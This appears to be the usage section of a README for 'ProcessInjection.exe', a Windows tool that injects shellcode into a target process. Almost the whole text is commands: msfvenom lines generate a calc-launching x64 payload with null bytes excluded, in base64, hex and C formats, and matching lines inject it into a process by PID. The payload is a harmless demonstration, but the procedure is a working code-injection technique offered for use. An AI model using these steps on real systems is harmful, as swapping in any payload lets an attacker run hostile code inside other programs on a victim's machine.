The program is designed to inject shellcode in a target process.
Currently the program accepts shellcode in 3 formats
1) base64
2) hex
3) C
Command Line Usage
Generating shellcode in base64 format and injecting it in the target process.
msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -b ""\x00"" | base64
ProcessInjection.exe /pid:123 /path:""C:\Users\User\Desktop\shellcode.txt"" /f:base64
Generating shellcode in hex format and injecting it in the target process.
msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -b ""\x00"" -f hex
ProcessInjection.exe /pid:123 /path:""C:\Users\User\Desktop\shellcode.txt"" /f:hex
Generating shellcode in c format and injecting it in the target process.
msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -b ""\x00"" -f c
ProcessInjection.exe /pid:123 /path:""C:\Users\User\Desktop\shellcode.txt"" /f:c
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